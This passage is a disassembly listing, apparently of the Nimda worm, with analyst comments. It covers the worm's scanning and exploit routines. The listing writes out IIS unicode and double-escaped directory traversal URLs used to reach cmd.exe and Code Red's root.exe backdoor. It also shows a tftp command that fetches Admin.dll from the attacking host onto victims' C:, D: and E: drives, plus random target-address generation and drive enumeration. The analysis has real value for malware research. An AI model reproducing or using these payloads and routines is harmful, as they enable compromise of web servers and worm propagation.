eax, eax 36172CAC jz short loc_36172CBD 36172CAE 36172CAE loc_36172CAE: ; CODE XREF: sub_36172C91+Cj 36172CAE inc edi 36172CAF add esi, 4 36172CB2 cmp edi, [esp+4+arg_4] 36172CB6 jbe short loc_36172C99 36172CB8 xor eax, eax 36172CBA 36172CBA loc_36172CBA: ; CODE XREF: sub_36172C91+2Ej 36172CBA pop edi 36172CBB pop esi 36172CBC retn 36172CBD ; ─────────────────────────────────────────────────────────────────────────── 36172CBD 36172CBD loc_36172CBD: ; CODE XREF: sub_36172C91+1Bj 36172CBD mov eax, edi 36172CBF jmp short loc_36172CBA 36172CBF sub_36172C91 endp 36172CBF 36172CC1 36172CC1 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172CC1 36172CC1 ; Attributes: bp-based frame 36172CC1 36172CC1 sub_36172CC1 proc near ; CODE XREF: sub_36172A08+10p 36172CC1 36172CC1 var_4 = byte ptr -4 36172CC1 arg_0 = dword ptr 8 36172CC1 arg_4 = dword ptr 0Ch 36172CC1 arg_8 = dword ptr 10h 36172CC1 arg_C = dword ptr 14h 36172CC1 36172CC1 push ebp 36172CC2 mov ebp, esp 36172CC4 push ecx 36172CC5 push ebx 36172CC6 push esi 36172CC7 mov esi, [ebp+arg_8] 36172CCA push edi 36172CCB mov edi, [ebp+arg_C] 36172CCE cmp dword ptr [esi], 0 36172CD1 jnz short loc_36172CDF 36172CD3 push dword ptr [edi] 36172CD5 push 0 36172CD7 call ds:LocalAlloc 36172CDD mov [esi], eax 36172CDF 36172CDF loc_36172CDF: ; CODE XREF: sub_36172CC1+10j 36172CDF mov ebx, 0EAh 36172CE4 36172CE4 loc_36172CE4: ; CODE XREF: sub_36172CC1+6Dj 36172CE4 mov eax, [edi] 36172CE6 mov [ebp+arg_8], eax 36172CE9 lea eax, [ebp+arg_8] 36172CEC push eax 36172CED lea eax, [ebp+var_4] 36172CF0 push dword ptr [esi] 36172CF2 push eax 36172CF3 push 0 36172CF5 push [ebp+arg_4] 36172CF8 push [ebp+arg_0] 36172CFB call ds:RegQueryValueExA 36172D01 cmp eax, ebx 36172D03 mov [ebp+arg_C], eax 36172D06 jnz short loc_36172D22 36172D08 push dword ptr [esi] 36172D0A call ds:LocalFree 36172D10 add dword ptr [edi], 400h 36172D16 push dword ptr [edi] 36172D18 push 0 36172D1A call ds:LocalAlloc 36172D20 mov [esi], eax 36172D22 36172D22 loc_36172D22: ; CODE XREF: sub_36172CC1+45j 36172D22 cmp dword ptr [esi], 0 36172D25 jz short loc_36172D30 36172D27 mov eax, [ebp+arg_C] 36172D2A cmp eax, ebx 36172D2C jnz short loc_36172D3B 36172D2E jmp short loc_36172CE4 36172D30 ; ─────────────────────────────────────────────────────────────────────────── 36172D30 36172D30 loc_36172D30: ; CODE XREF: sub_36172CC1+64j 36172D30 push dword ptr [esi] 36172D32 call ds:LocalFree 36172D38 push 8 36172D3A pop eax 36172D3B 36172D3B loc_36172D3B: ; CODE XREF: sub_36172CC1+6Bj 36172D3B pop edi 36172D3C pop esi 36172D3D pop ebx 36172D3E leave 36172D3F retn 36172D3F sub_36172CC1 endp 36172D3F 36172D40 36172D40 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172D40 36172D40 36172D40 sub_36172D40 proc near ; CODE XREF: sub_36172A2B+9p 36172D40 36172D40 arg_0 = dword ptr 4 36172D40 36172D40 mov ecx, [esp+arg_0] 36172D44 test ecx, ecx 36172D46 jz short loc_36172D4E 36172D48 mov eax, [ecx+18h] 36172D4B add eax, ecx 36172D4D retn 36172D4E ; ─────────────────────────────────────────────────────────────────────────── 36172D4E 36172D4E loc_36172D4E: ; CODE XREF: sub_36172D40+6j 36172D4E xor eax, eax 36172D50 retn 36172D50 sub_36172D40 endp 36172D50 36172D51 36172D51 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172D51 36172D51 36172D51 sub_36172D51 proc near ; CODE XREF: sub_36172A2B+22p 36172D51 ; sub_36172A5E+22p 36172D51 36172D51 arg_0 = dword ptr 4 36172D51 36172D51 mov ecx, [esp+arg_0] 36172D55 test ecx, ecx 36172D57 jz short loc_36172D5E 36172D59 mov eax, [ecx] 36172D5B add eax, ecx 36172D5D retn 36172D5E ; ─────────────────────────────────────────────────────────────────────────── 36172D5E 36172D5E loc_36172D5E: ; CODE XREF: sub_36172D51+6j 36172D5E xor eax, eax 36172D60 retn 36172D60 sub_36172D51 endp 36172D60 36172D61 36172D61 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172D61 36172D61 36172D61 sub_36172D61 proc near ; CODE XREF: sub_36172A5E+9p 36172D61 36172D61 arg_0 = dword ptr 4 36172D61 36172D61 mov ecx, [esp+arg_0] 36172D65 test ecx, ecx 36172D67 jz short loc_36172D6F 36172D69 mov eax, [ecx+8] 36172D6C add eax, ecx 36172D6E retn 36172D6F ; ─────────────────────────────────────────────────────────────────────────── 36172D6F 36172D6F loc_36172D6F: ; CODE XREF: sub_36172D61+6j 36172D6F xor eax, eax 36172D71 retn 36172D71 sub_36172D61 endp 36172D71 36172D72 36172D72 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172D72 36172D72 ; Attributes: bp-based frame 36172D72 36172D72 sub_36172D72 proc near ; CODE XREF: sub_36171F05+C0p 36172D72 36172D72 arg_0 = dword ptr 8 36172D72 36172D72 push ebp 36172D73 mov ebp, esp 36172D75 push esi 36172D76 push edi 36172D77 mov edi, [ebp+arg_0] 36172D7A xor esi, esi 36172D7C cmp edi, esi 36172D7E jle short loc_36172D99 36172D80 36172D80 loc_36172D80: ; CODE XREF: sub_36172D72+25j 36172D80 lea eax, [ebp+arg_0] 36172D83 mov [ebp+arg_0], esi 36172D86 push eax 36172D87 push esi 36172D88 push esi 36172D89 push offset loc_36172DA0 36172D8E push esi 36172D8F push esi 36172D90 call ds:CreateThread 36172D96 dec edi 36172D97 jnz short loc_36172D80 36172D99 36172D99 loc_36172D99: ; CODE XREF: sub_36172D72+Cj 36172D99 push 1 36172D9B pop eax 36172D9C pop edi 36172D9D pop esi 36172D9E pop ebp 36172D9F retn 36172DA0 ; ─────────────────────────────────────────────────────────────────────────── 36172DA0 36172DA0 loc_36172DA0: ; CODE XREF: sub_36172D72+3Aj 36172DA0 ; DATA XREF: sub_36172D72+17o 36172DA0 call sub_36172DAE 36172DA5 push eax 36172DA6 call sub_36172E97 ; The exploit guts. 36172DA6 ; 36172DA6 ; Uses unicode directory traversal (Bugtraq ID 1806) and IIS/PWS escaped chars 36172DA6 ; bug (Bugtraq ID 2708). 36172DA6 ; 36172DA6 ; In addition, it searches for hosts that have been hit by Code Red, as an additional vector. 36172DAB pop ecx 36172DAC jmp short loc_36172DA0 36172DAC sub_36172D72 endp 36172DAC 36172DAE 36172DAE ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172DAE 36172DAE 36172DAE sub_36172DAE proc near ; CODE XREF: sub_36172D72+2Ep 36172DAE ; sub_36176E91+Ap 36172DAE push ecx 36172DAF push 0FFFFFFFFh 36172DB1 push dword_3617D65C 36172DB7 call ds:WaitForSingleObject 36172DBD inc dword_3617D660 36172DC3 cmp dword_3617D660, 4FFFFFFFh 36172DCD jbe short loc_36172DD6 36172DCF and dword_3617D660, 0 36172DD6 36172DD6 loc_36172DD6: ; CODE XREF: sub_36172DAE+1Fj 36172DD6 push ebx 36172DD7 push ebp 36172DD8 push esi 36172DD9 push edi 36172DDA call ds:GetTickCount 36172DE0 add eax, dword_3617D660 36172DE6 push eax 36172DE7 call ds:srand 36172DED mov esi, ds:rand 36172DF3 pop ecx 36172DF4 call esi ; rand 36172DF6 shl eax, 3 36172DF9 mov ebx, 7FFFh 36172DFE cdq 36172DFF mov ecx, ebx 36172E01 idiv ecx 36172E03 cmp dword_3617D658, 0 36172E0A mov ebp, eax 36172E0C jnz short loc_36172E12 36172E0E test ebp, ebp 36172E10 jnz short loc_36172E23 36172E12 36172E12 loc_36172E12: ; CODE XREF: sub_36172DAE+5Ej 36172E12 call esi ; rand 36172E14 imul eax, 0FFh 36172E1A cdq 36172E1B mov ecx, ebx 36172E1D idiv ecx 36172E1F mov edi, eax 36172E21 jmp short loc_36172E27 36172E23 ; ─────────────────────────────────────────────────────────────────────────── 36172E23 36172E23 loc_36172E23: ; CODE XREF: sub_36172DAE+62j 36172E23 mov edi, [esp+10h] 36172E27 36172E27 loc_36172E27: ; CODE XREF: sub_36172DAE+73j 36172E27 cmp ebp, 3 36172E2A jg short loc_36172E3C 36172E2C test ebp, ebp 36172E2E jz short loc_36172E3C 36172E30 mov edi, dword_3617D654 36172E36 and edi, 0FFh 36172E3C 36172E3C loc_36172E3C: ; CODE XREF: sub_36172DAE+7Cj 36172E3C ; sub_36172DAE+80j 36172E3C call esi ; rand 36172E3E imul eax, 0FFh 36172E44 cdq 36172E45 mov ecx, ebx 36172E47 idiv ecx 36172E49 shl eax, 8 36172E4C or edi, eax 36172E4E cmp ebp, 3 36172E51 jle short loc_36172E5F 36172E53 mov edi, dword_3617D654 36172E59 and edi, 0FFFFh 36172E5F 36172E5F loc_36172E5F: ; CODE XREF: sub_36172DAE+A3j 36172E5F call esi ; rand 36172E61 imul eax, 0FFh 36172E67 cdq 36172E68 mov ecx, ebx 36172E6A idiv ecx 36172E6C shl eax, 10h 36172E6F or edi, eax 36172E71 call esi ; rand 36172E73 imul eax, 0FFh 36172E79 cdq 36172E7A idiv ebx 36172E7C push dword_3617D65C 36172E82 mov esi, eax 36172E84 shl esi, 18h 36172E87 call ds:ReleaseMutex 36172E8D mov eax, esi 36172E8F or eax, edi 36172E91 pop edi 36172E92 pop esi 36172E93 pop ebp 36172E94 pop ebx 36172E95 pop ecx 36172E96 retn 36172E96 sub_36172DAE endp 36172E96 36172E97 36172E97 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172E97 36172E97 ; The exploit guts. 36172E97 ; 36172E97 ; Uses unicode directory traversal (Bugtraq ID 1806) and IIS/PWS escaped chars 36172E97 ; bug (Bugtraq ID 2708). 36172E97 ; 36172E97 ; In addition, it searches for hosts that have been hit by Code Red, as an additional vector. 36172E97 ; Attributes: bp-based frame 36172E97 36172E97 sub_36172E97 proc near ; CODE XREF: sub_36172D72+34p 36172E97 36172E97 var_2FC = byte ptr -2FCh 36172E97 var_27C = byte ptr -27Ch 36172E97 var_17C = byte ptr -17Ch 36172E97 var_FC = byte ptr -0FCh 36172E97 var_C8 = byte ptr -0C8h 36172E97 var_48 = dword ptr -48h 36172E97 var_44 = dword ptr -44h 36172E97 var_40 = dword ptr -40h 36172E97 var_3C = dword ptr -3Ch 36172E97 var_38 = dword ptr -38h 36172E97 var_34 = dword ptr -34h 36172E97 var_30 = dword ptr -30h 36172E97 var_2C = dword ptr -2Ch 36172E97 var_28 = dword ptr -28h 36172E97 var_24 = dword ptr -24h 36172E97 var_20 = dword ptr -20h 36172E97 var_1C = dword ptr -1Ch 36172E97 var_18 = dword ptr -18h 36172E97 var_14 = dword ptr -14h 36172E97 var_10 = dword ptr -10h 36172E97 var_C = dword ptr -0Ch 36172E97 var_8 = dword ptr -8 36172E97 var_4 = dword ptr -4 36172E97 arg_0 = dword ptr 8 36172E97 36172E97 push ebp 36172E98 mov ebp, esp 36172E9A sub esp, 2FCh 36172EA0 push ebx 36172EA1 push esi 36172EA2 push edi 36172EA3 push 0Ch 36172EA5 pop ecx 36172EA6 mov esi, offset HTTP_GET ; "GET %s HTTP/1.0\r\nHost: www\r\nConnnection"... 36172EAB lea edi, [ebp-0FCh] 36172EB1 and dword ptr [ebp-4], 0 36172EB5 repe movsd 36172EB7 movsw 36172EB9 movsb 36172EBA mov esi, ds:sprintf 36172EC0 lea eax, [ebp-48h] 36172EC3 mov dword ptr [ebp-48h], offset scripts_dir ; "/scripts" 36172ECA mov dword ptr [ebp-44h], offset MSADC_dir ; "/MSADC" 36172ED1 mov dword ptr [ebp-40h], offset aC_0 ; "/c" 36172ED8 mov dword ptr [ebp-3Ch], offset aD ; "/d" 36172EDF mov dword ptr [ebp-38h], offset esc_char1 ; "/scripts/..%255c.." 36172EE6 mov dword ptr [ebp-34h], offset esc_char2 ; "/_vti_bin/..%255c../..%255c../..%255c.." 36172EED mov dword ptr [ebp-30h], offset esc_char3 ; "/_mem_bin/..%255c../..%255c../..%255c.." 36172EF4 mov dword ptr [ebp-2Ch], offset esc_char4 ; "/msadc/..%255c../..%255c../..%255c/..%c"... 36172EFB mov dword ptr [ebp-28h], offset unicode_1 ; "/scripts/..%c1%1c.." 36172F02 mov dword ptr [ebp-24h], offset unicode_2 ; "/scripts/..%c0%2f.." 36172F09 mov dword ptr [ebp-20h], offset unicode_3 ; "/scripts/..%c0%af.." 36172F10 mov dword ptr [ebp-1Ch], offset unicode_4 ; "/scripts/..%c1%9c.." 36172F17 mov dword ptr [ebp-18h], offset aScripts__3563_ ; "/scripts/..%%35%63.." 36172F1E mov dword ptr [ebp-14h], offset aScripts__35c__ ; "/scripts/..%%35c.." 36172F25 mov dword ptr [ebp-10h], offset aScripts__25356 ; "/scripts/..%25%35%63.." 36172F2C mov dword ptr [ebp-0Ch], offset aScripts__252f_ ; "/scripts/..%252f.." 36172F33 mov [ebp-8], eax 36172F36 36172F36 loc_36172F36: ; CODE XREF: sub_36172E97+2CEj 36172F36 mov eax, [ebp+var_8] 36172F39 mov ebx, [eax] 36172F3B lea eax, [ebp+var_C8] 36172F41 push ebx 36172F42 push eax 36172F43 call _strcpy 36172F48 cmp dword ptr [ebp-4], 2 36172F4C pop ecx 36172F4D pop ecx 36172F4E jge short loc_36172F57 36172F50 push offset root_exe ; this is trying to scavenge Code Red attempts 36172F55 jmp short loc_36172F5C 36172F57 ; ─────────────────────────────────────────────────────────────────────────── 36172F57 36172F57 loc_36172F57: ; CODE XREF: sub_36172E97+B7j 36172F57 push offset winnt_cmd ; else, the worm just tries executing a "dir c:" on the remote host 36172F5C 36172F5C loc_36172F5C: ; CODE XREF: sub_36172E97+BEj 36172F5C lea eax, [ebp-0C8h] 36172F62 push eax 36172F63 call _strcat 36172F68 pop ecx 36172F69 lea eax, [ebp-0C8h] 36172F6F pop ecx 36172F70 push offset dir ; "dir" 36172F75 push eax 36172F76 call _strcat 36172F7B lea eax, [ebp-0C8h] 36172F81 push eax 36172F82 lea eax, [ebp-0FCh] 36172F88 push eax 36172F89 lea eax, [ebp-27Ch] 36172F8F push eax 36172F90 call esi ; sprintf 36172F92 lea eax, [ebp-17Ch] 36172F98 push eax 36172F99 lea eax, [ebp-27Ch] 36172F9F push eax 36172FA0 push dword ptr [ebp+8] 36172FA3 call sub_36173173 36172FA8 add esp, 20h 36172FAB cmp eax, 63h 36172FAE jz loc_3617316B 36172FB4 test eax, eax 36172FB6 jz loc_3617315A 36172FBC lea eax, [ebp-17Ch] 36172FC2 push eax 36172FC3 call sub_361732F5 36172FC8 test eax, eax 36172FCA pop ecx 36172FCB jz loc_3617315A 36172FD1 xor edi, edi 36172FD3 36172FD3 loc_36172FD3: ; CODE XREF: sub_36172E97+255j 36172FD3 lea eax, [ebp-0C8h] 36172FD9 push ebx 36172FDA push eax 36172FDB call _strcpy 36172FE0 cmp dword ptr [ebp-4], 2 36172FE4 pop ecx 36172FE5 pop ecx 36172FE6 jge short loc_36172FEF 36172FE8 push offset root_exe ; "/root.exe?/c+" 36172FED jmp short loc_36172FF4 36172FEF ; ─────────────────────────────────────────────────────────────────────────── 36172FEF 36172FEF loc_36172FEF: ; CODE XREF: sub_36172E97+14Fj 36172FEF push offset winnt_cmd ; "/winnt/system32/cmd.exe?/c+" 36172FF4 36172FF4 loc_36172FF4: ; CODE XREF: sub_36172E97+156j 36172FF4 lea eax, [ebp-0C8h] 36172FFA push eax 36172FFB call _strcat 36173000 pop ecx 36173001 lea eax, [ebp-0C8h] 36173007 pop ecx 36173008 push offset TFTP_GET ; "tftp%%20-i%%20%s%%20GET%%20Admin.dll%%2"... 3617300D push eax 3617300E call _strcpy 36173013 cmp dword ptr [ebp-4], 2 36173017 pop ecx 36173018 pop ecx 36173019 jge short loc_36173022 3617301B push offset Admin_dll ; "Admin.dll" 36173020 jmp short loc_36173043 36173022 ; ─────────────────────────────────────────────────────────────────────────── 36173022 36173022 loc_36173022: ; CODE XREF: sub_36172E97+182j 36173022 test edi, edi 36173024 jnz short loc_3617302D 36173026 push offset C_Admin_dll ; "c:\\Admin.dll" 3617302B jmp short loc_36173043 3617302D ; ─────────────────────────────────────────────────────────────────────────── 3617302D 3617302D loc_3617302D: ; CODE XREF: sub_36172E97+18Dj 3617302D cmp edi, 1 36173030 jnz short loc_36173039 36173032 push offset D_Admin_dll ; "d:\\Admin.dll" 36173037 jmp short loc_36173043 36173039 ; ─────────────────────────────────────────────────────────────────────────── 36173039 36173039 loc_36173039: ; CODE XREF: sub_36172E97+199j 36173039 cmp edi, 2 3617303C jnz short loc_36173051 3617303E push offset E_Admin_dll ; "e:\\Admin.dll" 36173043 36173043 loc_36173043: ; CODE XREF: sub_36172E97+189j 36173043 ; sub_36172E97+194j ... 36173043 lea eax, [ebp-0C8h] 36173049 push eax 3617304A call _strcat 3617304F pop ecx 36173050 pop ecx 36173051 36173051 loc_36173051: ; CODE XREF: sub_36172E97+1A5j 36173051 lea eax, [ebp-0C8h] 36173057 push offset byte_3617D640 3617305C push eax 3617305D lea eax, [ebp+var_2FC] 36173063 push eax 36173064 call esi ; sprintf 36173066 lea eax, [ebp-0C8h] 3617306C push ebx 3617306D push eax 3617306E call _strcpy 36173073 add esp, 14h 36173076 cmp dword ptr [ebp-4], 2 3617307A jge short loc_36173083 3617307C push offset root_exe ; "/root.exe?/c+" 36173081 jmp short loc_36173088 36173083 ; ─────────────────────────────────────────────────────────────────────────── 36173083 36173083 loc_36173083: ; CODE XREF: sub_36172E97+1E3j 36173083 push offset winnt_cmd ; "/winnt/system32/cmd.exe?/c+" 36173088 36173088 loc_36173088: ; CODE XREF: sub_36172E97+1EAj 36173088 lea eax, [ebp+var_C8] 3617308E push eax 3617308F call _strcat 36173094 pop ecx 36173095 lea eax, [ebp+var_2FC] 3617309B pop ecx 3617309C push eax 3617309D lea eax, [ebp+var_C8] 361730A3 push eax 361730A4 call _strcat 361730A9 lea eax, [ebp+var_C8] 361730AF push eax 361730B0 lea eax, [ebp+var_FC] 361730B6 push eax 361730B7 lea eax, [ebp+var_27C] 361730BD push eax 361730BE call esi ; sprintf 361730C0 lea eax, [ebp+var_17C] 361730C6 push eax 361730C7 lea eax, [ebp+var_27C] 361730CD push eax 361730CE push [ebp+arg_0] 361730D1 call sub_36173173 361730D6 add esp, 20h 361730D9 cmp eax, 63h 361730DC jz loc_3617316B 361730E2 inc edi 361730E3 cmp [ebp+var_4], 1 361730E7 jle short loc_361730F2 361730E9 cmp edi, 3 361730EC jl loc_36172FD3 361730F2 361730F2 loc_361730F2: ; CODE XREF: sub_36172E97+250j 361730F2 test eax, eax 361730F4 jz short loc_3617315A 361730F6 lea eax, [ebp+var_17C] 361730FC push eax 361730FD call sub_361732F5 36173102 test eax, eax 36173104 pop ecx 36173105 jz short loc_3617315A 36173107 lea eax, [ebp+var_C8] 3617310D push ebx 3617310E push eax 3617310F call _strcpy 36173114 lea eax, [ebp+var_C8] 3617311A push offset aAdmin_dll_0 ; "/Admin.dll" 3617311F push eax 36173120 call _strcat 36173125 lea eax, [ebp+var_C8] 3617312B push eax 3617312C lea eax, [ebp+var_FC] 36173132 push eax 36173133 lea eax, [ebp+var_27C] 36173139 push eax 3617313A call esi ; sprintf 3617313C lea eax, [ebp+var_17C] 36173142 push eax 36173143 lea eax, [ebp+var_27C] 36173149 push eax 3617314A push [ebp+arg_0] 3617314D call sub_36173173 36173152 add esp, 28h 36173155 cmp eax, 63h 36173158 jz short loc_3617316B 3617315A 3617315A loc_3617315A: ; CODE XREF: sub_36172E97+11Fj 3617315A ; sub_36172E97+134j ... 3617315A inc [ebp+var_4] 3617315D add [ebp+var_8], 4 36173161 cmp [ebp+var_4], 10h 36173165 jl loc_36172F36 3617316B 3617316B loc_3617316B: ; CODE XREF: sub_36172E97+117j 3617316B ; sub_36172E97+245j ... 3617316B push 1 3617316D pop eax 3617316E pop edi 3617316F pop esi 36173170 pop ebx 36173171 leave 36173172 retn 36173172 sub_36172E97 endp 36173172 36173173 36173173 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173173 36173173 ; Attributes: bp-based frame 36173173 36173173 sub_36173173 proc near ; CODE XREF: sub_36172E97+10Cp 36173173 ; sub_36172E97+23Ap ... 36173173 36173173 var_120 = dword ptr -120h 36173173 var_11C = dword ptr -11Ch 36173173 var_1C = word ptr -1Ch 36173173 var_1A = word ptr -1Ah 36173173 var_18 = dword ptr -18h 36173173 var_C = dword ptr -0Ch 36173173 var_4 = dword ptr -4 36173173 arg_0 = dword ptr 8 36173173 arg_4 = dword ptr 0Ch 36173173 arg_8 = dword ptr 10h 36173173 36173173 push ebp 36173174 mov ebp, esp 36173176 sub esp, 120h 3617317C push ebx 3617317D push esi 3617317E push edi 3617317F xor esi, esi 36173181 push 10h 36173183 lea eax, [ebp+var_1C] 36173186 push esi 36173187 push eax 36173188 call _memset 3617318D mov eax, [ebp+arg_0] 36173190 add esp, 0Ch 36173193 mov [ebp+var_1C], 2 36173199 mov [ebp+var_18], eax 3617319C push 50h 3617319E call dword_3617AC38 361731A4 push esi 361731A5 push 1 361731A7 pop ebx 361731A8 mov [ebp+var_1A], ax 361731AC push ebx 361731AD push 2 361731AF call dword_3617AC5C 361731B5 mov edi, eax 361731B7 cmp edi, 0FFFFFFFFh 361731BA jnz short loc_361731C3 361731BC xor eax, eax 361731BE jmp loc_361732F0 361731C3 ; ─────────────────────────────────────────────────────────────────────────── 361731C3 361731C3 loc_361731C3: ; CODE XREF: sub_36173173+47j 361731C3 lea eax, [ebp+var_4] 361731C6 mov [ebp+var_4], ebx 361731C9 push eax 361731CA push 8004667Eh 361731CF push edi 361731D0 call dword_3617AC18 361731D6 test eax, eax 361731D8 jnz loc_361732E7 361731DE lea eax, [ebp+var_1C] 361731E1 push 10h 361731E3 push eax 361731E4 push edi 361731E5 call dword_3617AC58 361731EB push 8 361731ED lea eax, [ebp+var_C] 361731F0 push esi 361731F1 push eax 361731F2 call _memset 361731F7 add esp, 0Ch 361731FA lea eax, [ebp+var_C] 361731FD mov [ebp+var_C], 5 36173204 mov [ebp+var_11C], edi 3617320A push eax 3617320B lea eax, [ebp+var_120] 36173211 push esi 36173212 push eax 36173213 push esi 36173214 push esi 36173215 mov [ebp+var_120], ebx 3617321B call dword_3617AC40 36173221 cmp eax, esi 36173223 jz loc_361732E4 36173229 cmp eax, 0FFFFFFFFh 3617322C jz loc_361732E4 36173232 lea eax, [ebp+var_120] 36173238 push eax 36173239 push edi 3617323A call dword_3617AC60 36173240 test eax, eax 36173242 jz loc_361732E4 36173248 lea eax, [ebp+var_4] 3617324B mov [ebp+var_4], esi 3617324E push eax 3617324F push 8004667Eh 36173254 push edi 36173255 call dword_3617AC18 3617325B test eax, eax 3617325D jnz loc_361732E7 36173263 push esi 36173264 push [ebp+arg_4] 36173267 call _strlen 3617326C pop ecx 3617326D push eax 3617326E push [ebp+arg_4] 36173271 push edi 36173272 call dword_3617AC48 36173278 cmp eax, 0FFFFFFFFh 3617327B jz short loc_361732E7 3617327D push 8 3617327F lea eax, [ebp+var_C] 36173282 push esi 36173283 push eax 36173284 call _memset 36173289 add esp, 0Ch 3617328C lea eax, [ebp+var_C] 3617328F mov [ebp+var_C], 5Ah 36173296 mov [ebp+var_11C], edi 3617329C push eax 3617329D push esi 3617329E lea eax, [ebp+var_120] 361732A4 push esi 361732A5 push eax 361732A6 push esi 361732A7 mov [ebp+var_120], ebx 361732AD call dword_3617AC40 361732B3 cmp eax, esi 361732B5 jz short loc_361732E7 361732B7 cmp eax, 0FFFFFFFFh 361732BA jz short loc_361732E7 361732BC lea eax, [ebp+var_120] 361732C2 push eax 361732C3 push edi 361732C4 call dword_3617AC60 361732CA test eax, eax 361732CC jz short loc_361732E7 361732CE push esi 361732CF push 7Fh 361732D1 push [ebp+arg_8] 361732D4 push edi 361732D5 call dword_3617AC50 361732DB cmp eax, 0FFFFFFFFh 361732DE jz short loc_361732E7 361732E0 mov esi, ebx 361732E2 jmp short loc_361732E7 361732E4 ; ─────────────────────────────────────────────────────────────────────────── 361732E4 361732E4 loc_361732E4: ; CODE XREF: sub_36173173+B0j 361732E4 ; sub_36173173+B9j ... 361732E4 push 63h 361732E6 pop esi 361732E7 361732E7 loc_361732E7: ; CODE XREF: sub_36173173+65j 361732E7 ; sub_36173173+EAj ... 361732E7 push edi 361732E8 call dword_3617AC3C 361732EE mov eax, esi 361732F0 361732F0 loc_361732F0: ; CODE XREF: sub_36173173+4Bj 361732F0 pop edi 361732F1 pop esi 361732F2 pop ebx 361732F3 leave 361732F4 retn 361732F4 sub_36173173 endp 361732F4 361732F5 361732F5 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361732F5 361732F5 361732F5 sub_361732F5 proc near ; CODE XREF: sub_36172E97+12Cp 361732F5 ; sub_36172E97+266p 361732F5 361732F5 arg_0 = dword ptr 4 361732F5 361732F5 mov eax, [esp+arg_0] 361732F9 mov cl, [eax+9] 361732FC cmp cl, 32h 361732FF jnz short loc_3617330D 36173301 cmp byte ptr [eax+0Ah], 30h 36173305 jnz short loc_3617330D 36173307 cmp byte ptr [eax+0Bh], 30h 3617330B jz short loc_3617331E 3617330D 3617330D loc_3617330D: ; CODE XREF: sub_361732F5+Aj 3617330D ; sub_361732F5+10j 3617330D cmp cl, 35h 36173310 jnz short loc_36173322 36173312 cmp byte ptr [eax+0Ah], 30h 36173316 jnz short loc_36173322 36173318 cmp byte ptr [eax+0Bh], 32h 3617331C jnz short loc_36173322 3617331E 3617331E loc_3617331E: ; CODE XREF: sub_361732F5+16j 3617331E push 1 36173320 pop eax 36173321 retn 36173322 ; ─────────────────────────────────────────────────────────────────────────── 36173322 36173322 loc_36173322: ; CODE XREF: sub_361732F5+1Bj 36173322 ; sub_361732F5+21j ... 36173322 xor eax, eax 36173324 retn 36173324 sub_361732F5 endp 36173324 36173325 36173325 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173325 36173325 ; Attributes: bp-based frame 36173325 36173325 sub_36173325 proc near ; CODE XREF: sub_36171F05+E0p 36173325 ; sub_36171F05+131p 36173325 36173325 var_14 = byte ptr -14h 36173325 var_8 = dword ptr -8 36173325 var_4 = byte ptr -4 36173325 36173325 push ebp 36173326 mov ebp, esp 36173328 sub esp, 14h 3617332B push ebx 3617332C push esi 3617332D push edi 3617332E call ds:GetLogicalDrives ; Get bitmask representing 3617332E ; the currently available disk drives 36173334 mov [ebp+var_8], eax 36173337 xor ebx, ebx 36173339 36173339 loc_36173339: ; CODE XREF: sub_36173325+70j 36173339 push 1 3617333B lea ecx, [ebx+2] 3617333E pop eax 3617333F shl eax, cl 36173341 mov ecx, [ebp+var_8] 36173344 test ecx, eax 36173346 jz short loc_36173391 36173348 mov esi, offset aC_1 ; "c:" 3617334D lea edi, [ebp+var_4] 36173350 movsw 36173352 mov al, bl 36173354 add al, 63h 36173356 movsb 36173357 mov [ebp+var_4], al 3617335A lea eax, [ebp+var_4] 3617335D push eax 3617335E lea eax, [ebp+var_14] 36173361 push eax 36173362 call _strcpy 36173367 lea eax, [ebp+var_14] 3617336A push offset asc_36179474 ; "\\" 3617336F push eax 36173370 call _strcat 36173375 add esp, 10h 36173378 lea eax, [ebp+var_14] 3617337B push eax 3617337C call ds:GetDriveTypeA 36173382 cmp eax, 3 36173385 jnz short loc_36173391 36173387 lea eax, [ebp+var_4] 3617338A push eax 3617338B call sub_3617339F 36173390 pop ecx 36173391 36173391 loc_36173391: ; CODE XREF: sub_36173325+21j 36173391 ; sub_36173325+60j 36173391 inc ebx 36173392 cmp ebx, 18h 36173395 jl short loc_36173339 36173397 push 1 36173399 pop eax 3617339A pop edi 3617339B pop esi 3617339C pop ebx 3617339D leave 3617339E retn 3617339E sub_36173325 endp 3617339E 3617339F 3617339F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617339F 3617339F 3617339F sub_3617339F proc near ; CODE XREF: sub_36173325+66p 3617339F ; sub_3617339F+107p 3617339F 3617339F var_164 = dword ptr -164h 3617339F var_150 = dword ptr -150h 3617339F var_14C = byte ptr -14Ch 3617339F var_124 = byte ptr -124h 3617339F var_120 = byte ptr -120h 3617339F var_8 = dword ptr -8 3617339F arg_0 = dword ptr 4 3617339F 3617339F sub esp, 144h 361733A5 push ebx 361733A6 mov ebx, [esp+148h+arg_0] 361733AD push esi 361733AE push edi 361733AF push ebx 361733B0 call sub_361735F9 361733B5 cmp eax, 4 361733B8 pop ecx 361733B9 jg short loc_361733D5 361733BB mov edi, 400h 361733C0 push edi 361733C1 push 8 361733C3 push dword_3617ACB4 361733C9 call dword_3617AC74 361733CF mov esi, eax 361733D1 test esi, esi 361733D3 jnz short loc_361733DC 361733D5 361733D5 loc_361733D5: ; CODE XREF: sub_3617339F+1Aj 361733D5 xor eax, eax 361733D7 jmp loc_361735EF 361733DC ; ─────────────────────────────────────────────────────────────────────────── 361733DC 361733DC loc_361733DC: ; CODE XREF: sub_3617339F+34j 361733DC push edi 361733DD push ebx 361733DE push esi 361733DF call ds:strncpy 361733E5 push esi 361733E6 call sub_3617186E 361733EB push ebx 361733EC call _strlen 361733F1 mov ebx, ds:strncat 361733F7 mov ecx, edi 361733F9 sub ecx, eax 361733FB push ecx 361733FC push offset a_ ; "\\*.*" 36173401 push esi 36173402 call ebx ; strncat 36173404 add esp, 20h 36173407 lea eax, [esp+15Ch+var_14C] 3617340B push eax 3617340C push esi 3617340D call ds:FindFirstFileA 